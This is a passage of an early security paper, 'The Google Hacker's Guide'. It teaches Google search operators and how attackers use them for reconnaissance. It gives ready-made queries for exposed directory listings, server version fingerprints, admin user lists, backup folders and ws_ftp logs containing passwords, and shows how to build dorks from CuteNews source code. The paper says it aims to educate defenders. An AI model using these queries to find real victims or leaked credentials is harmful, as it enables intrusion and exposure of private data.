GOOGLE APPLIANCES ...................................................................................................................................... 31
GOOGLEDORKS................................................................................................................................................. 31
GOOSCAN ......................................................................................................................................................... 32
GOOPOT ........................................................................................................................................................... 32
GOOGLE SETS................................................................................................................................................... 34
A WORD ABOUT HOW GOOGLE FINDS PAGES (OPERA)................................................................. 35
PROTECTING YOURSELF FROM GOOGLE HACKERS...................................................................... 35
THANKS AND SHOUTS.................................................................................................................................. 36
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 3 -
The Google search engine found at www.google.com offers many different features
including language and document translation, web, image, newsgroups, catalog and
news searches and more. These features offer obvious benefits to even the most
uninitiated web surfer, but these same features allow for far more nefarious possibilities
to the most malicious Internet users including hackers, computer criminals, identity
thieves and even terrorists. This paper outlines the more nefarious applications of the
Google search engine, techniques that have collectively been termed “Google hacking.”
The intent of this paper is to educate web administrators and the security community in
the hopes of eventually securing this form of information leakage.
This document outlines the techniques that Google hackers can employ. This document
does not serve as a clearinghouse for all known techniques or searches. The
googledorks database, located at http://johnny.ihackstuff.com should be consulted for
information on all known attack searches.
Google search techniques
Google web interface
The Google search engine is fantastically easy to use. Despite the simplicity, it is very
important to have a firm grasp of these basic techniques in order to fully comprehend the
more advanced uses. The most basic Google search can involve a single word entered
into the search page found at www.google.com.
Figure 1: The main Google search page
As shown in Figure 1, I have entered the word “sardine” into the search screen. Figure 1
shows many of the options available from the www.google.com front page.
The Google toolbar
The Internet Explorer browser I am using has a Google
“toolbar” (a free download from toolbar.google.com) installed
and presented under the address bar. Although the toolbar
offers many different features, it is not a required element for
performing advanced searches. Even the most advanced
search functionality is available to any user able to access the
www.google.com web page with any type of browser, including
text-based and mobile browsers.
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 4 -
and presented under the address bar. Although the toolbar
offers many different features, it is not a required element for
performing advanced searches. Even the most advanced
search functionality is available to any user able to access the
www.google.com web page with any type of browser, including
text-based and mobile browsers.
“Web, Images,
Groups, Directory and
News” tabs
These tabs allow you to search web pages, photographs,
message group postings, Google directory listings, and news
stories respectively. First-time Google users should consider
that these tabs are not always a replacement for the “Submit
Search” button.
Search term input field
Located directly below the alternate search tabs, this text field
allows the user to enter a Google search term. Search term
rules will be described later.
“Submit Search”
This button submits the search term supplied by the user. In
many browsers, simply pressing the “Enter/Return” key after
typing a search term will activate this button.
“I’m Feeling Lucky”
Instead of presenting a list of search results, this button will
forward the user to the highest-ranked page for the entered
search term. Often times, this page is the most relevant page
for the entered search term.
“Advanced Search”
This link takes the user to the “Advanced Search” page as
shown in Figure 2. Much of the advanced search functionality is
accessible from this page. Some advanced features are not
listed on this page.
“Preferences”
This link allows the user to select several options (which are
stored in cookies on the user’s machine for later retrieval)
including languages, filters, number of results per page, and
window options.
“Language tools”
This link allows the user to set many different language options
and translate text to and from various languages.
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 5 -
Figure 2: Advanced Search page
Once a user submits a search by clicking the “Submit Search” button or by pressing
enter in the search term input box, a results page may be displayed as shown in Figure
3.
Figure 3: A basic Google search results page.
The search results page allows the user to explore the search results in various ways.
Top line
The top line (found under the alternate search tabs) lists the
search query, the number of hits displayed and found, and
how long the search took.
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 6 -
search query, the number of hits displayed and found, and
how long the search took.
“Category” link
This link takes you to the Google directory category for the
search you entered. The Google directory is a highly
organized directory of the web pages that Google monitors.
Main page link
This link takes you directly to a web page. Figure 3 shows
this as “Sardine Factory :: Home page”
Description
The short description of a site
Cached link
This link takes you to Google’s copy of this web page. This
is very handy if a web page changes or goes down.
“Similar Pages”
This link takes to you similar pages based on the Google
category.
“Sponsored Links”
coluimn
This column lists pay targeted advertising links based on
your search query.
Under certain circumstances, a blank error page (See Figure 4) may be presented
instead of the search results page. This page is the catchall error page, which generally
means Google encountered a problem with the submitted search term. Many times this
means that a search query option was not entered properly.
Figure 4: The "blank" error page
In addition to the “blank” error page, another error page may be presented as shown in
Figure 5. This page is much more descriptive, informing the user that a search term was
missing. This message indicates that the user needs to add to the search query.
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 7 -
Figure 5: Another Google error page
There is a great deal more to Google’s web-based search functionality which is not
covered in this paper.
Basic search techniques
Simple word searches
Basic Google searches, as I have already presented, consist of one or more
words entered without any quotations or the use of special keywords. Examples:
peanut butter
butter peanut
olive oil popeye
‘+’ searches
When supplying a list of search terms, Google automatically tries to find every
word in the list of terms, making the Boolean operator “AND” redundant. Some
search engines may use the plus sign as a way of signifying a Boolean “AND”.
Google uses the plus sign in a different fashion. When Google receives a basic
search request that contains a very common word like “the”, “how” or “where”,
the word will often times be removed from the query as shown in Figure 6.
Figure 6: Google removing overly common words
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 8 -
In order to force Google to include a common word, precede the search term with
a plus (+) sign. Do not use a space between the plus sign and the search term.
For example, the following searches produce slightly different results:
where quick brown fox
+where quick brown fox
The ‘+’ operator can also be applied to Google advanced operators, discussed
below.
‘-‘ searches
Excluding a term from a search query is as simple as placing a minus sign (-)
before the term. Do not use a space between the minus sign and the search
term. For example, the following searches produce slightly different results:
quick brown fox
quick –brown fox
The ‘-’ operator can also be applied to Google advanced operators, discussed
below.
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 9 -
Phrase Searches
In order to search for a phrase, supply the phrase surrounded by double-quotes.
Examples:
“the quick brown fox”
“liberty and justice for all”
“harry met sally”
Arguments to Google advanced operators can be phrases enclosed in quotes, as
described below.
Mixed searches
Mixed searches can involve both phrases and individual terms. Example:
macintosh "microsoft office"
This search will only return results that include the phrase “Microsoft office” and
the term macintosh.
Google advanced operators
Google allows the use of certain operators to help refine searches. The use of advanced
operators is very simple as long as attention is given to the syntax. The basic format is:
operator:search_term
Notice that there is no space between the operator, the colon and the search term. If a
space is used after a colon, Google will display an error message. If a space is used
before the colon, Google will use your intended operator as a search term.
Some advanced operators can be used as a standalone query. For example
‘cache:www.google.com’ can be submitted to Google as a valid search query. The
‘site’ operator, by contrast, must be used along with a search term, such as
‘site:www.google.com help’.
Table 1: Advanced Operator Summary
Operator
Description
Additional search
argument required?
site:
find search term only on site specified by search_term.
YES
filetype:
search documents of type search_term
YES
link:
find sites containing search_term as a link
NO
cache:
display the cached version of page specified by
search_term
NO
intitle:
find sites containing search_term in the title of a page
NO
inurl:
find sites containing search_term in the URL of the page
NO
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 10 -
site: find web pages on a specific web site
This advanced operator instructs Google to restrict a search to a specific web site or
domain. When using this operator, an addition search argument is required.
Example:
site:harvard.edu tuition
This query will return results from harvard.edu that include the term tuition anywhere on
the page.
filetype: search only within files of a specific type.
This operator instructs Google to search only within the text of a particular type of file.
This operator requires an additional search argument.
Example:
filetype:txt endometriosis
This query searches for the word ‘endometriosis’ within standard text documents. There
should be no period (.) before the filetype and no space around the colon following the
word “filetype”. It is important to note thatGoogle only claims to be able to search within
certain types of files. Based on my experience, Google can search within most files that
present as plain text. For example, Google can easily find a word within a file of type
“.txt,” “.html” or “.php” since the output of these files in a typical web browser window is
textual. By contrast, while a WordPerfect document may look like text when opened with
the WordPerfect application, that type of file is not recognizable to the standard web
browser without special plugins and by extension, Google can not interpret the
document properly, making a search within that document impossible. Thankfully,
Google can search within specific type of special files, making a search like
“filetype:doc endometriosis“ a valid one.
The current list of files that Google can search is listed in the filetype FAQ located at
http://www.google.com/help/faq_filetypes.html. As of this writing, Google can search
within the following file types:
•
Adobe Portable Document Format (pdf)
•
Adobe PostScript (ps)
•
Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
•
Lotus WordPro (lwp)
•
MacWrite (mw)
•
Microsoft Excel (xls)
•
Microsoft PowerPoint (ppt)
•
Microsoft Word (doc)
•
Microsoft Works (wks, wps, wdb)
•
Microsoft Write (wri)
•
Rich Text Format (rtf)
•
Text (ans, txt)
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 11 -
link: search within links
The hyperlink is one of the cornerstones of the Internet. A hyperlink is a selectable
connection from one web page to another. Most often, these links appear as underlined
text but they can appear as images, video or any other type of multimedia content. This
advanced operator instructs Google to search within hyperlinks for a search term. This
operator requires no other search arguments.
Example:
link:www.apple.com
This query query would display web pages that link to Apple.com’s main page. This
special operator is somewhat limited in that the link must appear exactly as entered in
the search query. The above query would not find pages that link to
www.apple.com/ipod, for example.
cache: display Google’s cached version of a page
This operator displays the version of a web page as it appeared when Google crawled
the site. This operator requires no other search arguments.
Example:
cache:johnny.ihackstuff.com
cache:http://johnny.ihackstuff.com
These queries would display the cached version of Johnny’s web page. Note that both of
these queries return the same result. I have discovered, however, that sometimes
queries formed like these may return different results, with one result being the dreaded
“cache page not found” error. This operator also accepts whole URL lines as arguments.
intitle: search within the title of a document
This operator instructs Google to search for a term within the title of a document. Most
web browsers display the title of a document on the top title bar of the browser window.
This operator requires no other search arguments.
Example:
intitle:gandalf
This query would only display pages that contained the word ‘gandalf’ in the title. A
derivative of this operator, ‘allintitle’ works in a similar fashion.
Example:
allintitle:gandalf silmarillion
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 12 -
This query finds both the words ‘gandalf’ and ‘silmarillion’ in the title of a page. The
‘allintitle’ operator instructs Google to find every subsequent word in the query only in the
title of the page. This is equivalent to a string of individual ‘intitle’ searches.
inurl: search within the URL of a page
This operator instructs Google to search only within the URL, or web address of a
document. This operator requires no other search arguments.
Example:
inurl:amidala
This query would display pages with the word ‘amidala’ inside the web address. One
returned result, ‘http://www.yarwood.org/kell/amidala/’ contains the word
‘amidala’ as the name of a directory. The word can appear anywhere within the web
address, including the name of the site or the name of a file. A derivative of this operator,
‘allinurl’ works in a similar fashion.
Example:
allinurl:amidala gallery
This query finds both the words ‘amidala’ and ‘gallery’ in the URL of a page. The ‘allinurl’
operator instructs Google to find every subsequent word in the query only in the URL of
the page. This is equivalent to a string of individual ‘inurl’ searches.
For a complete list of advanced operators and their usage, see
http://www.google.com/help/operators.html.
About Google’s URL syntax
The advanced Google user often times streamlines the search process by use of the
Google toolbar (not discussed here) or through direct use of Google URL’s. For
example, consider the URL generated by the web search for sardine:
http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=sardine
First,
notice
that
the
base
URL
for
a
Google
search
is
“http://www.google.com/search”. The question mark denotes the end of the URL
and the beginning of the arguments to the “search” program. The “&” symbol separates
arguments. The URL presented to the user may vary depending on many factors
including whether or not the search was submitted via the toolbar, the native language of
the user, etc. Arguments to the Google search program are well documented at
http://www.google.com/apis. The arguments found in the above URL are as follows:
hl:
Native language results, in this case “en” or English.
ie:
Input encoding, the format of incoming data. In this case “UTF-8”.
oe:
Output encoding, the format of outgoing data. In this case “UTF-8”.
q:
Query. The search query submitted by the user. In this case “sardine”.
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 13 -
Most of the arguments in this URL can be omitted, making the URL much more concise.
For example, the above URL can be shortened to
http://www.google.com/search?q=sardine
making the URL much more concise. Additional search terms can be appended to the
URL with the plus sign. For example, to search for “sardine” along with “peanut” and
“butter,” consider using this URL:
http://www.google.com/search?q=sardine+peanut+butter
Since simplified Google URLs are simple to read and portable, they are often used as a
way to represent a Google search.
Google (and many other web-based programs) must represent special characters like
quotation marks in a URL with a hexadecimal number preceded by a percent (%) sign in
order to follow the http URL standard. For example, a search for “the quick brown fox”
(paying special attention to the quotation marks) is represented as
http://www.google.com/search?&q=%22the+quick+brown+fox%22
In this example, a double quote is displayed as “%22” and spaces are replaced by plus
(+) signs. Google does not exclude overly common words from phrase searches. Overly
common words are automatically included when enclosed in double-quotes.
Google hacking techniques
Domain searches using the ‘site’ operator
The site operator can be expanded to search out entire domains. For example:
site:gov secret
This query searches every web site in the .gov domain for the word ‘secret’. Notice that
the site operator works on addresses in reverse. For example, Google expects the site
operator to be used like this:
site:www.cia.gov
site:cia.gov
site:gov
Google would not necessarily expect the site operator to be used like this:
site:www.cia
site:www
site:cia
The reason for this is simple. ‘Cia’ and ‘www’ are not valid top-level domain names. This
means that as of this writing, Internet names may not end in ‘cia’ or ‘www’. However,
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 14 -
sending unexpected queries like these are part of a competent Google hacker’s arsenal
as we explore in the “googleturds” section.
How this technique can be used
1. Journalists, snoops and busybodies in general can use this technique to find
interesting ‘dirt’ about a group of websites owned by organizations such as a
government or non-profit organization. Remember that top-level domain names
are often very descriptive and can include interesting groups such as: the U.S.
Government (.gov or .us)
2. Hackers searching for targets. If a hacker harbors a grudge against a specific
country or organization, he can use this type of search to find sensitive targets.
Finding ‘googleturds’ using the ‘site’ operator
Googleturds, as I have named them, are little dirty pieces of Google ‘waste’. These
search results seem to have stemmed from typos Google found while crawling a web
page. Example:
site:csc
site:microsoft
Neither of these queries are valid according to the loose rules of the ‘site’ operator, since
they do not end in valid top-level domain names. However, these queries produce
interesting results as shown in Figure 7.
Figure 7: Googleturd example
These little bits of information are most likely the results of typographical errors in links
place on web pages.
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 15 -
How this technique can be used
Hackers investigating a target can use munged site values based on the target’s name
to dig up Google pages (and subsequently potential sensitive data) that may not be
available to Google searches using the valid ‘site’ operator. Example: A hacker is
interested in sensitive information about ABCD Corporation, located on the web at
www.ABCD.com. Using a query like ‘site:ABCD’ may find mistyped links
(http://www.abcd instead of http://www.abcd.com) containing interesting information.
Site mapping: More about the ‘site’ operator
Mapping the contents of a web server via Google is simple. Consider the following
query:
site:www.microsoft.com microsoft
This query searches for the word ‘microsoft’, restricting the search to the
www.microsoft.com web site. How many pages on the Microsoft web server contain the
word ‘microsoft?’ According to Google, all of them! Remember that Google searches not
only the content of a page, but the title and URL as well. The word ‘microsoft’ appears in
the URL of every page on www.microsoft.com. With one single query, an attacker gains
a rundown of every web page on a site cached by Google.
There are some exceptions to this rule. If a link on the Microsoft web page points back to
the IP address of the Microsoft web server, Google will cache that page as belonging to
the IP address, not the www.micorosft.com web server. In this special case, an attacker
would simply alter the query, replacing the word ‘microsoft’ with the IP address(es) of the
Microsoft web server.
Google has recently added an additional method of accomplishing this task. This
technique allows Google users to simply enter a ‘site’ query alone. Example:
site:microsoft.com
This technique is simpler, but I’m not sure if this search technique is a permanent
Google feature.
Since Google only follows links that it finds on the Web, don’t expect this technique to
return every single web page hosted on a web server.
How this technique can be used
This technique makes it very simple for any interested party to get a complete rundown
of a website’s structure without ever visiting the website directly. Since Google searches
occur on Google’s servers, it stands to reason that only Google has a record of that
search. The process of viewing cached pages from Google can also be safe as long as
the Google hacker takes special care not to allow his browser to load linked content
such as images from that cached page. For a competent attacker, this is a trivial
exercise. Simply put, Google allows for a great deal of target reconnaissance that results
in little or no exposure for the attacker.
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 16 -
Finding Directory listings
Directory listings provide a list of files and directories in a browser window instead of the
typical text-and graphics mix generally associated with web pages. Figure 8 shows a
typical directory listing.
Figure 8: A typical directory listing
Directory listings are often placed on web servers purposely to allow visitors to browse
and download files from a directory tree. Many times, however, directory listings are not
intentional. A misconfigured web server may produce a directory listing if an index, or
main web page file is missing. In some cases, directory listings are setup as a
temporarily storage location for files. Either way, there’s a good chance that an attacker
may find something interesting inside a directory listing.
Locating directory listings with Google is fairly straightforward. Figure 8 shows that most
directory listings begin with the phrase “Index of”, which also shows in the title. An
obvious query to find this type of page might be “intitle:index.of”, which may find
pages with the term ‘index of’ in the title of the document. Remember that the period (.)
serves as a single-character wildcard in Google. Unfortunately, this query will return a
large number of false-positives such as pages with the following titles:
Index of Native American Resources on the Internet
LibDex - Worldwide index of library catalogues
Iowa State Entomology Index of Internet Resources
Judging from the titles of these documents, it is obvious that not only are these web
pages intentional, they are also not the directory listings we are looking for. (*jedi wave*
“This is not the directory listing you’re looking for.”) Several alternate queries provide
more accurate results:
intitle:index.of "parent directory"
intitle:index.of name size
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 17 -
These queries indeed provide directory listings by not only focusing on “index.of” in the
title, but on key words often found inside directory listings such as “parent directory”
“name” and “size.”
How this technique can be used
Bear in mind that many directory listings are intentional. However, directory listings
provide the Google hacker a very handy way to quickly navigate through a site. For the
purposes of finding sensitive or interesting information, browsing through lists of file and
directory names can be much more productive than surfing through the guided content
of web pages. Directory listings provide a means of exploiting other techniques such as
versioning and file searching, explained below.
Versioning: Obtaining the Web Server Software / Version
via directory listings
The exact version of the web server software running on a server is one piece of
required information an attacker requires before launching a successful attack against
that web server. If an attacker connects directly to that web server, the HTTP (web)
headers from that server can provide this information. It is possible, however, to retrieve
similar information from Google without ever connecting to the target server under
investigation. One method involves the using the information provided in a directory
listing.
Figure 9: Directory listing "server.at" example
Figure 9 shows the bottom line of a typical directory listing. Notice that the directory
listing includes the name of the server software as well as the version. An adept web
administrator can fake this information, but this information is often legitimate, allowing
an attacker to determine what attacks may work against the server. This example was
gathered using the following query:
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 18 -
intitle:index.of server.at
This query focuses on the term “index of” in the title and “server at” appearing at the
bottom of the directory listing. This type of query can additionally be pointed at a
particular web server:
intitle:index.of server.at site:aol.com
The result of this query indicates that gprojects.web.aol.com and vidup-r1.blue.aol.com,
both run Apache web servers.
intitle:index.of server.at site:apple.com
The result of this query indicates that mirror.apple.com runs an Apache web server. This
technique can also be used to find servers running a particular version of a web server.
For example:
intitle:index.of "Apache/1.3.0 Server at"
This query will find servers with directory listings enabled that are running Apache
version 1.3.0.
How this technique can be used
This technique is somewhat limited by the fact that the target must have at least one
page that produces a directory listing, and that listing must have the server version
stamped at the bottom of the page. There are more advanced techniques that can be
employed if the server ‘stamp’ at the bottom of the page is missing. This technique
involves a ‘profiling’ technique which involves focusing on the headers, title, and overall
format of the directory listing to observe clues as to what web server software is running.
By comparing known directory listing formats to the target’s directory listing format, a
competent Google hacker can generally nail the server version fairly quickly. This
technique is also flawed in that most servers allow directory listings to be completely
customized, making a match difficult. Some directory listings are not under the control of
the web server at all but instead rely on third-party software. In this particular case, it
may be possible to identify the third party software running by focusing on the source
(‘view source’ in most browsers) of the directory listing’s web page or by using the
profiling technique listed above.
Regardless of how likely it is to determine the web server version of a specific server
using this technique, hackers (especially web defacers) can use this technique to troll
Google for potential victims. If a hacker has an exploit that works against, say Apache
1.3.0, he can quickly scan Google for victims with a simple search like
‘intitle:index.of "Apache/1.3.0 Server at"’. This would return a list of
servers that have at least one directory listing with the Apache 1.3.0 server tag at the
bottom of the listing. This technique can be used for any web server that tags directory
listings with the server version, as long as the attacker knows in advance what that tag
might look like.
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 19 -
via default pages
It is also possible to determine the version of a web server based on default pages.
When a web server is installed, it generally will ship with a set of default web pages, like
the Apache 1.2.6 page shown in Figure 10.
Figure 10: Apache test page
These pages can make it easy for a site administrator to get a web server running. By
providing a simple page to test, the administrator can simply connect to his own web
server with a browser to validate that the web server was installed correctly. Some
operating systems even come with web server software already installed. In this case,
an Internet user may not even realize that a web server is running on his machine. This
type of casual behavior on the part of an Internet user will lead an attacker to rightly
assume that the web server is not well maintained and is, by extension insecure. By
further extension, the attacker can also assume that the entire operating system of the
server may be vulnerable by virtue of poor maintenance.
How this technique can be used
A simple query of “intitle:Test.Page.for.Apache it.worked!" will return a list
of sites running Apache 1.2.6 with a default home page. Other queries will return similar
Apache results:
Apache server version
Query
Apache 1.3.0 – 1.3.9
Intitle:Test.Page.for.Apache It.worked! this.web.site!
Apache 1.3.11 – 1.3.26
Intitle:Test.Page.for.Apache seeing.this.instead
Apache 2.0
Intitle:Simple.page.for.Apache Apache.Hook.Functions
Apache SSL/TLS
Intitle:test.page "Hey, it worked !" "SSL/TLS-aware"
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 20 -
Microsoft’s Internet Information Services (IIS) also ships with default web pages as
shown in Figure 11.
Figure 11: IIS 5.0 default web page
Queries that will locate default IIS web pages include:
IIS Server Version
Query
Many
intitle:welcome.to intitle:internet IIS
Unknown
intitle:"Under construction" "does not currently have"
IIS 4.0
intitle:welcome.to.IIS.4.0
IIS 4.0
allintitle:Welcome to Windows NT 4.0 Option Pack
IIS 4.0
allintitle:Welcome to Internet Information Server
IIS 5.0
allintitle:Welcome to Windows 2000 Internet Services
IIS 6.0
allintitle:Welcome to Windows XP Server Internet Services
In the case of Microsoft-based web servers, it is not only possible to determine web
server version, but operating system and server pack version as well. This information is
invaluable to an attacker bent on hacking not only the web server, but hacking beyond
the web server and into the operating system itself. In most cases, an attacker with
control of the operating system can wreak more havoc on a machine than a hacker that
only controls the web server.
Netscape Servers also ship with default pages as shown in Figure 12.
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 21 -
Figure 12: Netscape Enterprise Server default page
Some queries that will locate default Netscape web pages include:
Netscape Server Version
Query
Many
allintitle:Netscape Enterprise Server Home Page
Unknown
allintitle:Netscape FastTrack Server Home Page
Some queries to find more esoteric web servers/applications include:
Server / Version
Query
Jigsaw / 2.2.3
intitle:"jigsaw overview" "this is your"
Jigsaw / Many
intitle:”jigsaw overview”
iPlanet / Many
intitle:"web server, enterprise edition"
Resin / Many
allintitle:Resin Default Home Page
Resin / Enterprise
allintitle:Resin-Enterprise Default Home Page
JWS / 1.0.3 – 2.0
allintitle:default home page java web server
J2EE / Many
intitle:"default j2ee home page"
KFSensor honeypot
"KF Web Server Home Page"
Kwiki
"Congratulations! You've created a new Kwiki website."
Matrix Appliance
"Welcome to your domain web page" matrix
HP appliance sa1*
intitle:"default domain page" "congratulations" "hp web"
Intel Netstructure
"congratulations on choosing" intel netstructure
Generic Appliance
"default web page" congratulations "hosting appliance"
Debian Apache
intitle:"Welcome to Your New Home Page!" debian
Cisco Micro
Webserver 200
"micro webserver home page"
via manuals, help pages and sample programs
Another method of determining server version involves searching for manuals, help
pages or sample programs which may be installed on the website by default. Many web
server distributions install manual pages and sample programs in default locations. Over
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 22 -
the years, hackers have found many ways to exploit these default web applications to
gain privileged access to the web server. Because of this, most web server vendors
insist that administrators remove this sample code before placing a server on the
Internet. Regardless of the potential vulnerability of such programs, the mere existence
of these programs can help determine the web server type and version. Google can
stumble on these directories via a default-installed webpage or other means.
How this technique can be used
In addition to determining the web server version of a specific target, hackers can use
this technique to find vulnerable targets.
Example:
inurl:manual apache directives modules
This query returns pages that host the Apache web server manuals. The Apache
manuals are included in the default installation package of many different versions of
Apache. Different versions of Apache may have different styles of manual, and the
location of manuals may differ, if they are installed at all. As evidenced in Figure 13, the
server version is reported at the top of the manual page. This may not reflect the current
version of the web server if the server has been upgraded since the original installation.
Figure 13: Determining server version via server manuals
Microsoft’s IIS often deploy manuals (termed ‘help pages’) with various versions of their
web server. One way to search for these default help pages is with a query like
‘allinurl:iishelp core’.
Many versions of IIS optionally install sample applications. Many times, these sample
applications are included in a directory called ‘iissamples,’ which may be discovered
using a query like ‘inurl:iissamples’. In addition, the names of a sample program
can be included in the query such as ‘inurl:iissamples advquery.asp’ as shown
in Figure 14.
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 23 -
Figure 14: An IIS server with default sample code installed
Many times, subdirectories may exist inside the samples directory. A page with both the
‘iissamples’ directory and the ‘sdk’ directory can be found with a query like
‘inurl:iissamples sdk’.
There are many more combinations of default manual, help pages and sample programs
that can be searched for. As mentioned above, these programs often contain
vulnerabilities. Searching for vulnerable programs is yet another trick of the Google
hacker.
Using Google to find interesting files and directories
Using Google to find vulnerable targets can be very rewarding. However, it is often more
rewarding to find not only vulnerabilities but to find sensitive data that is not meant for
public viewing. People and organizations leave this type of data on web servers all the
time (trust me, I’ve found quite a bit of it). Now remember, Google is only crawling a
small percentage of the pages that contain this type of data, but the tradeoff is that
Google’s data can be retrieved from Google quickly, quietly and without much fuss.
It is not uncommon to find sensitive data such as financial information, social security
numbers, medical information, and the like.
How this technique can be used
Of all the techniques examined this far, this technique is the hardest to describe because
it takes a bit of imagination and sometimes just a bit of luck. Often the best way to find
sensitive files and directories is to find them in the context of other “important” words and
phrases.
inurl: searches
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 24 -
Consider the fact that many people store an entire hodgepodge of data inside backup
directories. Often times, the entire content of a web server or personal computer can be
found in a directory called backup. Using a simple query like “inurl:backup” can
yield potential backup directories, yet refining the search to something like
“inurl:backup intitle:index.of inurl:admin” can reveal even more
relevant results. A query like “inurl:admin” can often reveal administrative
directories.
“inurl:admin inurl:userlist” is a generic catch-all query which finds many
different types of administrative userlist pages. These results may take some sorting
through, but the benefits are certainly worth it, as results range from usernames,
passwords, phone numbers, addresses, etc.
filetype:
The inurl: search is one way of finding files, but often times the filetype: operative is
much more effective. It is worth noting that every single known file extension (extracted
from filext.com) can be found with Google. This includes file types that Google can not
read. The point is that even if Google can’t parse a file, it still understands the file’s
extension and can search on it.
An interesting technique exists for discovering all known files of a particular extension.
The technique involves the used of the filetype: operator. Consider the following search:
“filetype:cfg cfg”
This search finds files that end in a “cfg” extension. In addition, the file must contain “cfg”
in either the url, the text or the title. All files of type “cfg” have the term “cfg” in the URL,
so this search shows all known “cfg” files that Google has crawled. When combined with
a site: search, this query can be used to find all “cfg” files from one particular site.
“inurl:admin filetype:xls” can reveal interesting Excel spreadsheets either
named “admin” or stored in a directory named “admin”. Educational institutions are
notorious for falling victim to this search.
combination searches
Combining the techniques listed above can provide more accurate results.
“inurl:admin intitle:login” can reveal admin login pages
“inurl:admin filetype:asp inurl:userlist” will find more specific examples
of an administrator’s user list function, this time written in an ASP page. In most cases,
these types of pages do not require authentication.
ws_ftp.log file searches
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 25 -
Another interesting technique (discovered by murfie) involves scouring ws_ftp.log files
for the existence of files on a web server. The WS_FTP program is a graphical FTP
client for Windows that creates log files tracking all file transfers. Enabled by default,
these log files are placed on the target FTP server and include information about which
files were transferred, where they came from, and where they were ultimately
transferred. Interesting in and of themselves, these files create an excellent opportunity
for the Google hacker to discover files on a web server.
For example, to locate password files, a search like “filetype:log inurl:ws_ftp
intext:password” or “filetype:log inurl:ws_ftp intext:passwd” may
provide useful results.
Using Source Code to find vulnerable targets
Nearly every day, a security advisory is release for some web-based tool. These
advisories often contain information about the version of the software that is affected, the
type of vulnerability and information about how attackers can exploit the vulnerability.
Google can be used to find sites with specific vulnerabilities using only the information
provided in these advisories. We will take a look at how a hacker might use the source
code of a program to discover ways to search for that software with Google.
The CuteNews program had a (minor) vulnerability back in November of 2003:
Figure 15: A typical Security Advisory
As explained in the security advisory, an attacker could use a specially crafted URL to
gain information from a vulnerable target:
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 26 -
Figure 16: Exploit information from a typical advisory
In order to find the best search string to locate potentially vulnerable targets, an attacker
could visit the web page of the software vendor to find the source code of the offending
software. In cases where source code is not available, an attacker can simply download
the offending software and run it on a machine he controls to get ideas for potential
searches. In this case, version 1.3.1 of the CuteNews software is readily available from
the author’s web page.
Once the software is downloaded and optionally unzipped, an attacker must located the
main web page that would be displayed to visitors. In the case of this particular
software, PHP files are used to display web pages.
Figure 17: The contents of the CuteNews download
Of all the files listed in the main directory of this package, index.php is the most likely
candidate to be a top-level page.
156 // If User is Not Logged In, Display The Login Page
Figure 18: Line 156 of index.php
Line 156 shows a typical informative comment. This comment reveals that this is the
page a user would see if they were not logged in.
173 <td width=80>Username: </td>
174 <td><input tabindex=1 type=text
name=username value='$lastusername' style=\"width:134\"></td>
175 </tr>
176 <tr>
177 <td>Password: </td>
178 <td><input type=password name=password style=\"width:134\"></td>
Figure 19: Lines 173-178 of index.php
Lines 173-178 show typical HTML code and reveal a username and password prompt
that is displayed to the user. Searching for these strings in Google would prove to be too
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 27 -
common. Something more specific must be located. Farther down in the code, a line of
PHP reveals that a footer is placed at the bottom of the page:
191 echofooter();
Figure 20: Line 191 of index.php
In order to discover what this footer looks like, we must locate where the echofooter
function is defined. This can be done simply with grep by searching recursively for
“echofooter” with the word “function” preceeding it. This search is more effective than
simply searching for “echofooter” which is called in many of CuteNews’ scripts.
johnny-longs-g4 root# grep -r "function echofooter" *
inc/functions.inc.php:function echofooter(){
johnny-longs-g4 root#
Figure 21: Locating functions in PHP
According to the grep command, we know to look in the file “inc/functions.inc.php” for
footer (and probably the header) text.
Figure 22: The echofooter function
Although there is a great deal of information in this function, there are certain things that
will catch the eye of a Google hacker due to the uniqueness of the string. For example,
line 168 shows that copyrights are printed and that the term “Powered by” is printed in
the footer. Any decent Google hackers knows that “Powered by” lines can be very useful
in locating specific targets due to their high degree of uniqueness. Following the
“Powered by” phrase is a link to http://cutephp.com/cutenews/ and the string
“$config_version_name”, which will list the version name of the CuteNews program. In
order to have a very specific “Powered by” search to feed to Google, the attacker must
either guess as to the version number that would be displayed (remembering that
version 1.3.1 of SuteNews was downloaded) or the actual version number displayed
must be located in the source code. Again, grep can quickly locate this string for us. We
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 28 -
can either search for the string directly, or put an equal sign (‘=’) after the string to find
where it is defined in the code:
johnny-longs-g4 root$ grep -r "\$config_version_name =" *
inc/install.mdu:\$config_version_name = "CuteNews v1.3.1";
inc/options.mdu: fwrite($handler, "<?PHP \n\n//System
Configurations\n\n\$config_version_name =
\"$config_version_name\";\n\n\$config_version_id = $config_version_id;\n\n");
